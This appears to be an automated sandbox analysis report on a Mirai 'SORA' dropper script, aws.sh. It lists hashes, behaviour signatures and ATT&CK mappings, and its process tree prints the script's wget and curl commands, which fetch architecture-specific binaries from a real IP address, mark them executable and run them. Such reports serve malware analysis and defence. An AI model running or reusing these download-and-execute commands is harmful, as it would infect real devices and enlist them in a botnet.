Analysis
-
max time kernel
13s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-11-2024 14:37
Static task
static1
Behavioral task
behavioral1
Sample
aws.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
aws.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
aws.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
aws.sh
-
Size
2KB
-
MD5
b9ea41c0744886c9aa436d2560a56f9d
-
SHA1
eab007c33f66384f237c3385f56ad11522778fcd
-
SHA256
03f69bcb2f4e202c7372cf932d65338255201439fe776cd8ac8a9632065555bf
-
SHA512
767eafb58db47b959fa25019f2ecb7bc93d983e84fee08303918b36b9c0034b2675dd6751b66dcf990a80018ae48c25c5789502b385e668cc2b6f96d2dd41889
Malware Config
Extracted
mirai
SORA
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 732 chmod 773 chmod 704 chmod 761 chmod 802 chmod 745 chmod 787 chmod 678 chmod 691 chmod 719 chmod 820 chmod 665 chmod 685 chmod 768 chmod -
Executes dropped EXE 14 IoCs
Processes:
robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenioc pid process /tmp/robben 667 robben /tmp/robben 679 robben /tmp/robben 686 robben /tmp/robben 694 robben /tmp/robben 706 robben /tmp/robben 721 robben /tmp/robben 733 robben /tmp/robben 746 robben /tmp/robben 762 robben /tmp/robben 769 robben /tmp/robben 775 robben /tmp/robben 788 robben /tmp/robben 803 robben /tmp/robben 821 robben -
Processes:
resource yara_rule /tmp/sora.x86 upx /tmp/robben upx /tmp/robben upx /tmp/robben upx -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlrobbencurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlrobbendescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe robben File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe robben File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlwgetwgetwgetwgetwgetcurlwgetcurlcurlcurlcurlaws.shcurlwgetcurlwgetwgetcurlwgetcurlcurlcurlwgetdescription ioc process File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/robben aws.sh File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.arm6 wget
Processes
-
/tmp/aws.sh/tmp/aws.sh1⤵
- Writes file to tmp directory
PID:639 -
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x862⤵
- Writes file to tmp directory
PID:641
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:653
-
-
/bin/catcat sora.x862⤵PID:664
-
-
/bin/chmodchmod +x aws.sh robben sora.x86 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:665
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:667
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:669
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:674
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:676
-
-
/bin/chmodchmod +x aws.sh robben sora.mips sora.x86 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:679
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:682
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:683
-
-
/bin/catcat sora.x86_642⤵PID:684
-
-
/bin/chmodchmod +x aws.sh robben sora.mips sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:686
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i4682⤵PID:688
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/catcat sora.i4682⤵PID:690
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.mips sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:694
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i6862⤵
- Writes file to tmp directory
PID:695
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:698
-
-
/bin/catcat sora.i6862⤵PID:703
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:704
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:706
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:709
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:713
-
-
/bin/catcat sora.mpsl2⤵PID:718
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:719
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:721
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm42⤵PID:723
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/catcat sora.arm42⤵PID:730
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:733
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm52⤵
- Writes file to tmp directory
PID:734
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/catcat sora.arm52⤵PID:743
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:746
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm62⤵
- Writes file to tmp directory
PID:747
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/catcat sora.arm62⤵PID:760
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
- Reads runtime system information
PID:762
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm72⤵
- Writes file to tmp directory
PID:764
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/catcat sora.arm72⤵PID:767
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
- Reads runtime system information
PID:769
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:770
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/catcat sora.ppc2⤵PID:772
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:775
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc440fp2⤵PID:778
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/catcat sora.ppc440fp2⤵PID:785
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:788
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/catcat sora.m68k2⤵PID:800
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:803
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.sh42⤵
- Writes file to tmp directory
PID:805
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/catcat sora.sh42⤵PID:819
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_64 systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-gHwW872⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:821
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5fa5457b7546c1b7060c30bde3f8649ca
SHA17c75f6463c36eaebc4719f47d8047e5195a85057
SHA256d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf
SHA512f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21
-
Filesize
28KB
MD5ec332610b0ca5b634c097ed14f42eedc
SHA1abcbd111601f4165c400e9db36fbf20339e37170
SHA2562bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a
SHA512f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5d356657b6ea7a715b60217a914eb6ca8
SHA1b276b1a91895c3025e9f9d64227205dac79c8ef6
SHA256b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22
SHA5123b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262
-
Filesize
64KB
MD5fb3d051f41bd7347aeff64980f2d100b
SHA15261ff91b8d99d6b8f5f647e33aad29b90cee973
SHA25619f4b46d738fa23ff571db081cea0bf34509b9799de2116853e77691faaebec1
SHA51282dd9805571030fc4a56a8d5838f5ee3fe1b162f059c905a48f37abcc4dc58442e1e909ab4a2352d690af8ac306eafe4d89cb87f37baec8a8136d48e884be4dd
-
Filesize
27KB
MD500eff503439515d9b12b9c068367cb80
SHA182d68f2b1ffca8558458c1b858599542a67d8bbf
SHA2562962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276
SHA5123800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5